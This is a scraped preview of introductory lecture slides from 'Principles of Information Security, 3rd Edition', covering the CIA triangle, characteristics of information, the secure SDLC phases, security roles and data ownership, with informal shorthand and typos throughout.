View
632
Download
0
Category
Preview:
DESCRIPTION
Citation preview
Principles of Information Security, 3rd Edition 2
Define information security Relate the history of computer security and how it
evolved into information security Define key terms and critical concepts of information
security as presented in this chapter Discuss the phases of the security systems
development life cycle Present the roles of professionals involved in
information security within an organization
Learning ObjectivesUpon completion of this material, you should be able to:
Principles of Information Security, 3rd Edition 13
What is Security?
“The quality or state of being secure—to be free from danger” or Protection against adversary
A successful organization should have multiple layers of security in place: Physical security Personal security Operations security Communications security Network security Information security
Principles of Information Security, 3rd Edition 14
What is Security? (continued) The protection of information and its critical elements, including systems
and hardware that use, store, and transmit that information
CNSS/NSTISSC-STD’s
To protect -Necessary tools: policy, awareness, training, education, technology
NSTISSC model evolved from CIA-since Mainframe
C.I.A. triangle was standard based on confidentiality, integrity, and availability
Lack of CIA – growing environment
C.I.A. triangle now expanded into list of critical characteristics of information
Principles of Information Security, 3rd Edition 15
Principles of Information Security, 3rd Edition 16
Critical Characteristics of Information The value of information comes from the characteristics it
possesses: Changes-value ><
Availability Authorized users-access infr. Without obstruction Eg:research library-check/ specified format
Accuracy Accuracy-free mistakes/expected end user value Eg:bank a/c
Authenticity State of being genuine or original Information authentic-without change eg:Spoofing,Phising
Confidentiality Disclosure /exposure to unauthorized user Measures
Classification
Storage
Poloices
Education
Eg: salami theft
Principles of Information Security, 3rd Edition 17
Integrity Whole,complete,noncorruptted Viruses-file size File hashing-hash value-algorithm Noise in transmission Prevent – algorithm,error correcting code
Utility-meaningful manner Possession
Principles of Information Security, 3rd Edition 18
Principles of Information Security, 3rd Edition 19
Figure 1-4 – NSTISSC Security ModelNSTISSC Security Model
Principles of Information Security, 3rd Edition 20
Components of an Information System
Information system (IS) is entire set of software, hardware, data, people, procedures, and networks necessary to use information as a resource in the organization
Principles of Information Security, 3rd Edition 21
Securing Components
Computer can be subject of an attack and/or the object of an attack
When the subject of an attack, computer is used as an active tool to conduct attack
When the object of an attack, computer is the entity being attacked
Direct/inderect
Principles of Information Security, 3rd Edition 22
Figure 1-5 – Subject and Object of Attack
Principles of Information Security, 3rd Edition 23
Balancing Information Security and Access
Impossible to obtain perfect security—it is a process, not an absolute
Security should be considered balance between protection and availability
To achieve balance, level of security must allow reasonable access, yet protect against threats
Principles of Information Security, 3rd Edition 24
Figure 1-6 – Balancing Security and Access
Principles of Information Security, 3rd Edition 25
Approaches to Information Security Implementation: Bottom-Up Approach
Grassroots effort: systems administrators attempt to improve security of their systems
Key advantage: technical expertise of individual administrators
Seldom works, as it lacks a number of critical features:
Participant support
Organizational staying power
Principles of Information Security, 3rd Edition 26
Approaches to Information Security Implementation: Top-Down Approach
Initiated by upper management
Issue policy, procedures, and processes
Dictate goals and expected outcomes of project
Determine accountability for each required action
The most successful also involve formal development strategy referred to as systems development life cycle
Principles of Information Security, 3rd Edition 27
Securing system development life cycle
SDLC consider-system and information
Check custom/COTS
Organization decide-General SDLC/Tailored SDLC
NIST recommends IT security steps.
Principles of Information Security, 3rd Edition 36
Securing system development life cycle……
Investigation/Analysis Phase:
Security Categorization(low,modrate,high) Depends on system assists to select security controls over
information.
Preliminary Risk Assesment Define threat environment where system works
Principles of Information Security, 3rd Edition 37
Securing system development life cycle……
Logical/Physical design Phase: Risk Assesment:
Builds on intial RA Security assurance Requirement Analysis
Development activities required Evidence of confidential-inf.security is effective
Security Functional Requirement Analysis System security environment Security functional requirements
Cost: s/w,h/w,people
Principles of Information Security, 3rd Edition 38
Securing system development life cycle…… Security Planning:
Agreed upon plans like Contigency plan CM plan Incident response plan…..
Security Control Development: Assure security plan is
Designed Developed implemented
Principles of Information Security, 3rd Edition 39
Securing system development life cycle……
Developmental security test and evalution: Test the implemented plan Some cannot till deployment
Other planning Components: Ensures necessary components Contract type Participation of fn. Groups, certifier
Principles of Information Security, 3rd Edition 40
Securing system development life cycle…… Implementation Phase:
Inspection and Acceptance: Verifies and Validates-functionality in deliverables
System Integration: Ensures integrity in deployment environment
Security certification: Uncovers vulnerabilities Ensures controls implemented effectively through
Procedures Validation techniques
Security Acceriditation Provides authorization of infr.to store, transmit… Granted by senior official.
Principles of Information Security, 3rd Edition 41
Securing system development life cycle…… Maintenance and Change Phase:
CM and Control: Ensures adequate consideration to inf.sec while changes
Continuous Monitoring: Ensures continuous control effectivness
Information Preservation: Current legal requirements Accommodate future technology
Media Sanitization: Unwanted data deleted,erased.
H/w and s/w disposal:
Principles of Information Security, 3rd Edition 42
Principles of Information Security, 3rd Edition 51
Senior Management
Chief Information Officer (CIO)
Senior technology officer
Primarily responsible for advising senior executives on strategic planning
Chief Information Security Officer (CISO)/ manager
Primarily responsible for assessment, management, and implementation of IS in the organization
Usually reports directly to the CIO
Principles of Information Security, 3rd Edition 52
Information Security Project Team
A number of individuals who are experienced in one or more facets of required technical and nontechnical areas: Champion-support financially,adminstrative Team leader-proj,people.manage,technical requirements Security policy developers Risk assessment specialists Security professionals Systems administrators End users
Principles of Information Security, 3rd Edition 53
Data Ownership
Data owner: responsible for the security and use of a particular set of information
Data custodian: responsible for storage, maintenance, and protection of information
Data users: end users who work with information to perform their daily jobs supporting the mission of the organization
54
Communities of Interest Group of individuals united by similar interests/values within an
organization or who share common goals to meet organization objective
Information security management and professionals
Protect infr. From attack
Information technology management and professionals
Focus on cost, ease of use.
Organizational management and professionals/users/sec subjects
Execution,production,hr....
Principles of Information Security, 3rd Edition 55
Information Security: Is it an Art or a Science?
Implementation of information security often described as combination of art and science
“Security artesan” idea: based on the way individuals perceive systems technologists since computers became commonplace
Principles of Information Security, 3rd Edition 56
Security as Art
Eg:painter
No hard and fast rules nor many universally accepted complete solutions
No manual for implementing security through entire system
Principles of Information Security, 3rd Edition 57
Security as Science
Dealing with technology designed to operate at high levels of performance
Specific conditions cause virtually all actions that occur in computer systems
Nearly every fault, security hole, and systems malfunction are a result of interaction of specific hardware and software
If developers had sufficient time, they could resolve and eliminate faults
Principles of Information Security, 3rd Edition 58
Security as a Social Science
Social science examines the behavior of individuals interacting with systems
Security begins and ends with the people that interact with the system
Security administrators can greatly reduce levels of risk caused by end users, and create more acceptable and supportable security profiles
Principles of Information Security, 3rd Edition 60
Summary
Information security is a “well-informed sense of assurance that the information risks and controls are in balance”
Computer security began immediately after first mainframes were developed
Successful organizations have multiple layers of security in place: physical, personal, operations, communications, network, and information
Principles of Information Security, 3rd Edition 61
Summary (continued)
Security should be considered a balance between protection and availability
Information security must be managed similarly to any major system implemented in an organization using a methodology like SecSDLC
Implementation of information security often described as a combination of art and science
Recommended